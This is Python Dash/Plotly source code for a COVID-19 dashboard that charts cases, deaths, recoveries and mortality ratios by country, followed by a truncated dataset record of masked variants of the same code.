legend=dict(x=.2, y=-.15, orientation='h')) return vals,final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Confirmed_Diff'],{'data':trace_1, 'layout': layout_t1},final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Deaths_Diff'],{'data':trace_2, 'layout':layout_t2},final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Recovered_Diff'],{'data':trace_3, 'layout':layout_t3} @app.callback( 
Output(component_id='box-1',component_property='figure'), [Input(component_id='main-dropdown', component_property = 'value'), Input(component_id='main-dropdown-2', component_property = 'value')]) def update_maingraph(selected_country, selected_graph): if selected_graph is None and selected_country is None: selected_country = 'Canada' figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[(final_df['Country_Region'] == selected_country) ,'Date'], y = final_df.loc[(final_df['Country_Region'] == selected_country) ,'Confirmed'], marker_color='#648FFF')] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range':[0, (final_df.loc[(final_df['Country_Region'] == selected_country) ,'Confirmed'].max() * 1.10)], 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, title='Overall Progression of COVID-19: {0}'.format(str(selected_country)), hovermode='x unified', xaxis=dict(title='Date', fixedrange=True, automargin=True, showline=True, mirror=False, linewidth=2, linecolor='black')) return {'data':figmain_t, 'layout': figmain_l} elif selected_graph is None and selected_country is not None: figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[(final_df['Country_Region'] == selected_country) ,'Date'], y = final_df.loc[(final_df['Country_Region'] == selected_country) ,'Confirmed'], marker_color='#648FFF')] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range':[0, (final_df.loc[(final_df['Country_Region'] == selected_country) ,'Confirmed'].max() * 1.10)], 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, title='Overall Progression of COVID-19: {0}'.format(str(selected_country)), hovermode='x unified', xaxis=dict(title='Date', fixedrange=True, automargin=True, showline=True, mirror=False, linewidth=2, linecolor='black')) return {'data':figmain_t, 'layout': figmain_l} elif selected_graph == 'Total and Daily Confirmed Cases': figmain_t = [go.Scatter(name='Total Confirmed 
Cases', x=final_df.loc[(final_df['Country_Region'] == selected_country) ,'Date'], y = final_df.loc[(final_df['Country_Region'] == selected_country) ,'Confirmed'], line=dict(color='#1A85FF', width = 1.5), mode='lines'), go.Scatter(name='Daily Confirmed Cases', x=final_df.loc[(final_df['Country_Region'] == selected_country) ,'Date'], y=final_df.loc[(final_df['Country_Region'] == selected_country),'Confirmed_Diff'], line=dict(color='#D41159', width = 3), mode='lines', fill='tozeroy')] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range':[0, (final_df.loc[(final_df['Country_Region'] == selected_country) ,'Confirmed'].max() * 1.10)], 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, title='Overall Progression of COVID-19 ({0}): {1}'.format(str(selected_country), str(selected_graph)), hovermode='x unified', xaxis=dict(title='Date',fixedrange=True, automargin=True, showline=True, mirror=False, linewidth=2, linecolor='black')) return {'data':figmain_t, 'layout': figmain_l} else: cols_dict = {'Confirmed':'#648FFF', 'Deaths':'#DC267F', 'Recovered':'#009E73'} figmain_t = [go.Bar(name='Total {0}'.format(selected_graph), x=final_df.loc[(final_df['Country_Region'] == selected_country) ,'Date'], y = final_df.loc[(final_df['Country_Region'] == selected_country) ,selected_graph], marker_color=cols_dict[selected_graph])] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range':[0, (final_df.loc[(final_df['Country_Region'] == selected_country) ,selected_graph].max() * 1.10)], 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, title='Overall Progression of COVID-19 ({0}): {1}'.format(str(selected_country), str(selected_graph)), hovermode='x unified', xaxis=dict(title='Date', fixedrange=True, automargin=True, showline=True, mirror=False, linewidth=2, linecolor='black')) return {'data':figmain_t, 'layout': figmain_l} if __name__ == '__main__': app.run_server()
flexible
{ "blob_id": "1e02d584cde0cdf251aa36abd27b683219ef87ed", "index": 7539, "step-1": "<mask token>\n\n\n@app.callback(Output(component_id='global-box-1', component_property=\n 'figure'), [Input(component_id='global-dropdown', component_property=\n 'value')])\ndef global_update(select_global):\n if select_global == 'Global Cases Trend' or select_global is None:\n fig1000 = []\n anno = []\n for group, dataframe in cases_1000_start.groupby(by='Country_Region'):\n di = dataframe.sort_values(by=['Days Since 1000 Cases'])\n trace = go.Scatter(x=di['Days Since 1000 Cases'].tolist(), y=di\n ['Confirmed'].tolist(), mode='lines', line=dict(color=\n colors_dict_global[list(di.loc[:, 'Continent'])[0]], width=\n 1), opacity=0.6, text=di.Country_Region.tolist(),\n legendgroup=list(di.loc[:, 'Continent'])[0], hovertemplate=\n '<b>%{text}</b><br>' + '<br>Confirmed Cases: %{y}<br>' +\n 'Days Since First 1000 Cases: %{x}<br>', showlegend=False)\n a = {'x': int(di['Days Since 1000 Cases'].max() + 1.5), 'y': np\n .log10(int(di['Confirmed'].max())), 'xref': 'x', 'yref':\n 'y', 'showarrow': False, 'text': list(di.loc[:,\n 'Country_Region'])[0], 'xanchor': 'right', 'yanchor':\n 'middle', 'align': 'center', 'font': {'size': 8, 'color':\n 'black'}, 'bordercolor': '#ffffff', 'borderwidth': 1,\n 'borderpad': 1, 'bgcolor': '#ffffff', 'opacity': 0.6}\n fig1000.append(trace)\n anno.append(a)\n fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start[\n 'Days Since 1000 Cases'].max())), y=[(1000 * math.exp(0.2310491 *\n i)) for i in list(np.arange(cases_1000_start[\n 'Days Since 1000 Cases'].max()))], name=\n 'Cases Double Every 3 Days', mode='lines', opacity=0.25, line=\n dict(color='grey', width=3, dash='dash'), text=[\n '# of Cases Double Every 3 Days'], hovertemplate=\n '<b>Cases Double Every 3 Days</b>', showlegend=True))\n fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start[\n 'Days Since 1000 Cases'].max())), y=[(1000 * math.exp(0.099021 *\n i)) for i in 
list(np.arange(cases_1000_start[\n 'Days Since 1000 Cases'].max()))], name=\n 'Cases Double Every 7 Days', mode='lines', opacity=0.25, line=\n dict(color='grey', width=3, dash='dot'), text=[\n '# of Cases Double Every 7 Days'], hovertemplate=\n '<b>Cases Double Every 7 Days</b>', showlegend=True))\n layout_global = go.Layout(yaxis={'title':\n 'Number of Confirmed Cases', 'range': [np.log10(1000), np.log10\n (cases_1000_start['Confirmed'].max() * 1.1)], 'type': 'log',\n 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black',\n 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': \n False}, title='Overall Confirmed Cases', xaxis={'title':\n 'Days Since First 1000 Cases', 'range': [0, cases_1000_start[\n 'Days Since 1000 Cases'].max()], 'fixedrange': True,\n 'linewidth': 2, 'linecolor': 'black', 'showgrid': False,\n 'showline': True, 'mirror': False}, height=750, hovermode=\n 'closest', annotations=anno)\n fig_global = {'data': fig1000, 'layout': layout_global}\n return fig_global\n elif select_global == 'Global Deaths Trend':\n fig100 = []\n anno = []\n for group, dataframe in deaths_100_start.groupby(by='Country_Region'):\n di = dataframe.sort_values(by=['Days Since 100 Deaths'])\n trace = go.Scatter(x=di['Days Since 100 Deaths'].tolist(), y=di\n ['Deaths'].tolist(), mode='lines', line=dict(color=\n colors_dict_global[list(di.loc[:, 'Continent'])[0]], width=\n 1), opacity=0.6, text=di.Country_Region.tolist(),\n legendgroup=list(di.loc[:, 'Continent'])[0], hovertemplate=\n '<b>%{text}</b><br>' + '<br>Deaths: %{y}<br>' +\n 'Days Since First 1000 Cases: %{x}<br>', showlegend=False)\n a = {'x': int(di['Days Since 100 Deaths'].max() + 1.5), 'y': np\n .log10(int(di['Deaths'].max())), 'xref': 'x', 'yref': 'y',\n 'showarrow': False, 'text': list(di.loc[:, 'Country_Region'\n ])[0], 'xanchor': 'right', 'yanchor': 'middle', 'align':\n 'center', 'font': {'size': 8, 'color': 'black'},\n 'bordercolor': '#ffffff', 'borderwidth': 1, 'borderpad': 1,\n 'bgcolor': '#ffffff', 
'opacity': 0.6}\n fig100.append(trace)\n anno.append(a)\n fig100.append(go.Scatter(x=list(np.arange(deaths_100_start[\n 'Days Since 100 Deaths'].max())), y=[(100 * math.exp(0.2310491 *\n i)) for i in list(np.arange(deaths_100_start[\n 'Days Since 100 Deaths'].max()))], name=\n 'Deaths Double Every 3 Days', mode='lines', opacity=0.25, line=\n dict(color='grey', width=3, dash='dash'), text=[\n '# of Deaths Double Every 3 Days'], hovertemplate=\n '<b>Deaths Double Every 3 Days</b>', showlegend=True))\n fig100.append(go.Scatter(x=list(np.arange(deaths_100_start[\n 'Days Since 100 Deaths'].max())), y=[(100 * math.exp(0.099021 *\n i)) for i in list(np.arange(deaths_100_start[\n 'Days Since 100 Deaths'].max()))], name=\n 'Deaths Double Every 7 Days', mode='lines', opacity=0.25, line=\n dict(color='grey', width=3, dash='dot'), text=[\n '# of Deaths Double Every 7 Days'], hovertemplate=\n '<b>Deaths Double Every 7 Days</b>', showlegend=True))\n layout_global = go.Layout(yaxis={'title': 'Number of Deaths',\n 'range': [np.log10(100), np.log10(cases_1000_start['Deaths'].\n max() * 1.1)], 'type': 'log', 'fixedrange': True, 'linewidth': \n 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1,\n 'showline': True, 'mirror': False}, title='Overall Deaths',\n xaxis={'title': 'Days Since First 100 deaths', 'range': [0,\n deaths_100_start['Days Since 100 Deaths'].max()], 'fixedrange':\n True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False,\n 'showline': True, 'mirror': False}, height=750, hovermode=\n 'closest', annotations=anno)\n fig_global = {'data': fig100, 'layout': layout_global}\n return fig_global\n elif select_global == '% Mortality by Confirmed Cases (Top 20 Countries)':\n figmort = []\n anno = []\n m = mort.sort_values(by=['Confirmed'], ascending=False).head(20)\n m = m.sort_values(by=['Mortality_Percent'], ascending=True\n ).reset_index()\n for i in range(len(m)):\n m1 = m.loc[i, 'Country_Region']\n m2 = m.loc[i, 'Mortality_Percent']\n trace = 
go.Bar(name='Observed Case - Mortality Ratio', x=[m2],\n y=[m1], text=[round(m.loc[i, 'Mortality_Percent'], 2)],\n orientation='h', textposition='auto', marker=dict(color=\n '#FFB000', opacity=0.6, line=dict(color=\n 'rgba(255,176,0, 1)', width=1)), hovertemplate=\n '<b>%{y}</b><br>' +\n '<br>Observed Case Mortaility Pct: %{text}&#37;<br>',\n showlegend=False)\n figmort.append(trace)\n layout_global = go.Layout(yaxis={'title': 'Country / Region',\n 'fixedrange': True, 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Observed Case - Mortality Ratio', xaxis={'title':\n '% Mortality by Confirmed Cases (Top 20 Countries)', 'range': [\n 0, m['Mortality_Percent'].max() + 2], 'fixedrange': True,\n 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor':\n 'black'}, height=750, hovermode='closest')\n fig_global = {'data': figmort, 'layout': layout_global}\n return fig_global\n elif select_global == 'Recoveries vs. Deaths By Country':\n figscat = []\n rc = mort.loc[(mort['Deaths'] >= 100) & (mort['Recovered'] >= 100)\n ].reset_index()\n for i in range(len(rc)):\n scat = go.Scatter(x=[rc.loc[i, 'Deaths']], y=[rc.loc[i,\n 'Recovered']], mode='markers+text', text=[rc.loc[i,\n 'Country_Region']], marker_color=colors_dict_global[rc.loc[\n i, 'Continent']], showlegend=False, marker=dict(size=12,\n line_width=1, opacity=0.75), hovertemplate=\n '<b>%{text}</b><br>' + '<br>Recoveries: %{y}<br>' +\n 'Deaths: %{x}<br>', textposition='bottom center', textfont=\n dict(size=10, color='rgba(0, 0, 0, 0.6)'))\n figscat.append(scat)\n figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(\n ), 3)), y=[i for i in list(np.linspace(100, rc['Deaths'].max(),\n 3))], mode='lines', name='Deaths = Recoveries', opacity=0.25,\n line=dict(color='grey', width=1), text=[\n '# of Deaths = # of Recoveries'], hovertemplate=\n '<b># of Deaths = # of Recoveries</b>', showlegend=True))\n 
figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(\n ), 3)), y=[(i * 2) for i in list(np.linspace(100, rc['Deaths'].\n max(), 3))], mode='lines', name='2 Recoveries for Every Death',\n opacity=0.25, line=dict(color='green', width=3, dash='dash'),\n text=['2 Recoveries for Every Death'], hovertemplate=\n '<b>2 Recoveries for Every Death</b>', showlegend=True))\n figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(\n ), 3)), y=[(i / 2) for i in list(np.linspace(100, rc['Deaths'].\n max(), 3))], mode='lines', name='2 Deaths for Every Recovery',\n opacity=0.25, line=dict(color='firebrick', width=3, dash='dash'\n ), text=['2 Deaths for Every Recovery'], hovertemplate=\n '<b>2 Deaths for Every Recovery</b>', showlegend=True))\n layout_global = go.Layout(yaxis={'title': 'Number of Recoveries',\n 'fixedrange': True, 'automargin': True, 'range': [np.log10(100),\n np.log10(rc['Recovered'].max() * 1.1)], 'type': 'log',\n 'linewidth': 2, 'linecolor': 'black', 'showgrid': False,\n 'dtick': 1, 'showline': True, 'mirror': False}, title=\n 'Recoveries vs. 
Deaths, By Country', xaxis={'title':\n 'Number of Deaths', 'fixedrange': True, 'range': [np.log10(100),\n np.log10(rc['Deaths'].max() * 1.1)], 'type': 'log', 'linewidth':\n 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1,\n 'showline': True, 'mirror': False}, height=750, hovermode='closest'\n )\n fig_global = {'data': figscat, 'layout': layout_global}\n return fig_global\n\n\n@app.callback([Output(component_id='main-dropdown-2', component_property=\n 'options'), Output(component_id='btext1', component_property='children'\n ), Output(component_id='subplot1', component_property='figure'), Output\n (component_id='btext2', component_property='children'), Output(\n component_id='subplot2', component_property='figure'), Output(\n component_id='btext3', component_property='children'), Output(\n component_id='subplot3', component_property='figure')], [Input(\n component_id='main-dropdown', component_property='value')])\ndef update_country(selected_country):\n if selected_country is None:\n selected_country = 'Canada'\n options = ['Confirmed', 'Recovered', 'Deaths',\n 'Total and Daily Confirmed Cases']\n vals = [{'label': i, 'value': i} for i in options]\n trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6\n ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'].tail(45\n ), y=final_df.loc[final_df['Country_Region'] ==\n selected_country, 'Confirmed_Diff'].tail(45).rolling(window=5).\n mean(), mode='lines', line=dict(color='#648FFF', width=3))]\n layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Confirmed Cases: {0} (Last 45 Days)'.format(\n selected_country), xaxis={'type': 
'date', 'automargin': True,\n 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor':\n 'black'}, height=300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6),\n go.Scatter(name='5 Day Moving Average', x=final_df.loc[final_df\n ['Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines',\n line=dict(color='#DC267F', width=3))]\n layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Deaths: {0} (Last 45 Days)'.format(selected_country),\n xaxis={'type': 'date', 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=\n 300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6\n ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'].tail(45\n ), y=final_df.loc[final_df['Country_Region'] ==\n selected_country, 'Recovered_Diff'].tail(45).rolling(window=5).\n mean(), mode='lines', line=dict(color='#009E73', width=3))]\n layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Recovered: {0} (Last 45 Days)'.format(selected_country),\n xaxis={'type': 'date', 'automargin': True, 'showline': True,\n 
'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=\n 300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n return vals, final_df.loc[(final_df['Date'] == final_df['Date'].max\n ()) & (final_df['Country_Region'] == selected_country),\n 'Confirmed_Diff'], {'data': trace_1, 'layout': layout_t1\n }, final_df.loc[(final_df['Date'] == final_df['Date'].max()) &\n (final_df['Country_Region'] == selected_country), 'Deaths_Diff'], {\n 'data': trace_2, 'layout': layout_t2}, final_df.loc[(final_df[\n 'Date'] == final_df['Date'].max()) & (final_df['Country_Region'\n ] == selected_country), 'Recovered_Diff'], {'data': trace_3,\n 'layout': layout_t3}\n else:\n options = ['Confirmed', 'Recovered', 'Deaths',\n 'Total and Daily Confirmed Cases']\n vals = [{'label': i, 'value': i} for i in options]\n trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6\n ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'].tail(45\n ), y=final_df.loc[final_df['Country_Region'] ==\n selected_country, 'Confirmed_Diff'].tail(45).rolling(window=5).\n mean(), mode='lines', line=dict(color='#648FFF', width=3))]\n layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Confirmed Cases: {0} (Last 45 Days)'.format(\n selected_country), xaxis={'type': 'date', 'automargin': True,\n 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor':\n 'black'}, height=300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 
'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6),\n go.Scatter(name='5 Day Moving Average', x=final_df.loc[final_df\n ['Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines',\n line=dict(color='#DC267F', width=3))]\n layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Deaths: {0} (Last 45 Days)'.format(selected_country),\n xaxis={'type': 'date', 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=\n 300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6\n ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'].tail(45\n ), y=final_df.loc[final_df['Country_Region'] ==\n selected_country, 'Recovered_Diff'].tail(45).rolling(window=5).\n mean(), mode='lines', line=dict(color='#009E73', width=3))]\n layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Recovered: {0} (Last 45 Days)'.format(selected_country),\n xaxis={'type': 'date', 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=\n 300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n return vals, final_df.loc[(final_df['Date'] == final_df['Date'].max\n ()) & (final_df['Country_Region'] == selected_country),\n 'Confirmed_Diff'], {'data': trace_1, 'layout': layout_t1\n }, final_df.loc[(final_df['Date'] == 
final_df['Date'].max()) &\n (final_df['Country_Region'] == selected_country), 'Deaths_Diff'], {\n 'data': trace_2, 'layout': layout_t2}, final_df.loc[(final_df[\n 'Date'] == final_df['Date'].max()) & (final_df['Country_Region'\n ] == selected_country), 'Recovered_Diff'], {'data': trace_3,\n 'layout': layout_t3}\n\n\n@app.callback(Output(component_id='box-1', component_property='figure'), [\n Input(component_id='main-dropdown', component_property='value'), Input(\n component_id='main-dropdown-2', component_property='value')])\ndef update_maingraph(selected_country, selected_graph):\n if selected_graph is None and selected_country is None:\n selected_country = 'Canada'\n figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'], y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'], marker_color='#648FFF')]\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [\n 0, final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Overall Progression of COVID-19: {0}'.format(str(\n selected_country)), hovermode='x unified', xaxis=dict(title=\n 'Date', fixedrange=True, automargin=True, showline=True, mirror\n =False, linewidth=2, linecolor='black'))\n return {'data': figmain_t, 'layout': figmain_l}\n elif selected_graph is None and selected_country is not None:\n figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'], y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'], marker_color='#648FFF')]\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [\n 0, final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 
'linecolor': 'black'}, title=\n 'Overall Progression of COVID-19: {0}'.format(str(\n selected_country)), hovermode='x unified', xaxis=dict(title=\n 'Date', fixedrange=True, automargin=True, showline=True, mirror\n =False, linewidth=2, linecolor='black'))\n return {'data': figmain_t, 'layout': figmain_l}\n elif selected_graph == 'Total and Daily Confirmed Cases':\n figmain_t = [go.Scatter(name='Total Confirmed Cases', x=final_df.\n loc[final_df['Country_Region'] == selected_country, 'Date'], y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'], line=dict(color='#1A85FF', width=1.5), mode=\n 'lines'), go.Scatter(name='Daily Confirmed Cases', x=final_df.\n loc[final_df['Country_Region'] == selected_country, 'Date'], y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed_Diff'], line=dict(color='#D41159', width=3), mode=\n 'lines', fill='tozeroy')]\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [\n 0, final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Overall Progression of COVID-19 ({0}): {1}'.format(str(\n selected_country), str(selected_graph)), hovermode='x unified',\n xaxis=dict(title='Date', fixedrange=True, automargin=True,\n showline=True, mirror=False, linewidth=2, linecolor='black'))\n return {'data': figmain_t, 'layout': figmain_l}\n else:\n cols_dict = {'Confirmed': '#648FFF', 'Deaths': '#DC267F',\n 'Recovered': '#009E73'}\n figmain_t = [go.Bar(name='Total {0}'.format(selected_graph), x=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Date'], y=final_df.loc[final_df['Country_Region'] ==\n selected_country, selected_graph], marker_color=cols_dict[\n selected_graph])]\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [\n 0, final_df.loc[final_df['Country_Region'] == selected_country,\n selected_graph].max() * 
1.1], 'automargin': True, 'showline': \n True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'},\n title='Overall Progression of COVID-19 ({0}): {1}'.format(str(\n selected_country), str(selected_graph)), hovermode='x unified',\n xaxis=dict(title='Date', fixedrange=True, automargin=True,\n showline=True, mirror=False, linewidth=2, linecolor='black'))\n return {'data': figmain_t, 'layout': figmain_l}\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\n@app.callback(Output(component_id='global-box-1', component_property=\n 'figure'), [Input(component_id='global-dropdown', component_property=\n 'value')])\ndef global_update(select_global):\n if select_global == 'Global Cases Trend' or select_global is None:\n fig1000 = []\n anno = []\n for group, dataframe in cases_1000_start.groupby(by='Country_Region'):\n di = dataframe.sort_values(by=['Days Since 1000 Cases'])\n trace = go.Scatter(x=di['Days Since 1000 Cases'].tolist(), y=di\n ['Confirmed'].tolist(), mode='lines', line=dict(color=\n colors_dict_global[list(di.loc[:, 'Continent'])[0]], width=\n 1), opacity=0.6, text=di.Country_Region.tolist(),\n legendgroup=list(di.loc[:, 'Continent'])[0], hovertemplate=\n '<b>%{text}</b><br>' + '<br>Confirmed Cases: %{y}<br>' +\n 'Days Since First 1000 Cases: %{x}<br>', showlegend=False)\n a = {'x': int(di['Days Since 1000 Cases'].max() + 1.5), 'y': np\n .log10(int(di['Confirmed'].max())), 'xref': 'x', 'yref':\n 'y', 'showarrow': False, 'text': list(di.loc[:,\n 'Country_Region'])[0], 'xanchor': 'right', 'yanchor':\n 'middle', 'align': 'center', 'font': {'size': 8, 'color':\n 'black'}, 'bordercolor': '#ffffff', 'borderwidth': 1,\n 'borderpad': 1, 'bgcolor': '#ffffff', 'opacity': 0.6}\n fig1000.append(trace)\n anno.append(a)\n fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start[\n 'Days Since 1000 Cases'].max())), y=[(1000 * math.exp(0.2310491 *\n i)) for i in list(np.arange(cases_1000_start[\n 'Days Since 1000 Cases'].max()))], name=\n 'Cases Double Every 3 Days', 
mode='lines', opacity=0.25, line=\n dict(color='grey', width=3, dash='dash'), text=[\n '# of Cases Double Every 3 Days'], hovertemplate=\n '<b>Cases Double Every 3 Days</b>', showlegend=True))\n fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start[\n 'Days Since 1000 Cases'].max())), y=[(1000 * math.exp(0.099021 *\n i)) for i in list(np.arange(cases_1000_start[\n 'Days Since 1000 Cases'].max()))], name=\n 'Cases Double Every 7 Days', mode='lines', opacity=0.25, line=\n dict(color='grey', width=3, dash='dot'), text=[\n '# of Cases Double Every 7 Days'], hovertemplate=\n '<b>Cases Double Every 7 Days</b>', showlegend=True))\n layout_global = go.Layout(yaxis={'title':\n 'Number of Confirmed Cases', 'range': [np.log10(1000), np.log10\n (cases_1000_start['Confirmed'].max() * 1.1)], 'type': 'log',\n 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black',\n 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': \n False}, title='Overall Confirmed Cases', xaxis={'title':\n 'Days Since First 1000 Cases', 'range': [0, cases_1000_start[\n 'Days Since 1000 Cases'].max()], 'fixedrange': True,\n 'linewidth': 2, 'linecolor': 'black', 'showgrid': False,\n 'showline': True, 'mirror': False}, height=750, hovermode=\n 'closest', annotations=anno)\n fig_global = {'data': fig1000, 'layout': layout_global}\n return fig_global\n elif select_global == 'Global Deaths Trend':\n fig100 = []\n anno = []\n for group, dataframe in deaths_100_start.groupby(by='Country_Region'):\n di = dataframe.sort_values(by=['Days Since 100 Deaths'])\n trace = go.Scatter(x=di['Days Since 100 Deaths'].tolist(), y=di\n ['Deaths'].tolist(), mode='lines', line=dict(color=\n colors_dict_global[list(di.loc[:, 'Continent'])[0]], width=\n 1), opacity=0.6, text=di.Country_Region.tolist(),\n legendgroup=list(di.loc[:, 'Continent'])[0], hovertemplate=\n '<b>%{text}</b><br>' + '<br>Deaths: %{y}<br>' +\n 'Days Since First 1000 Cases: %{x}<br>', showlegend=False)\n a = {'x': int(di['Days Since 100 
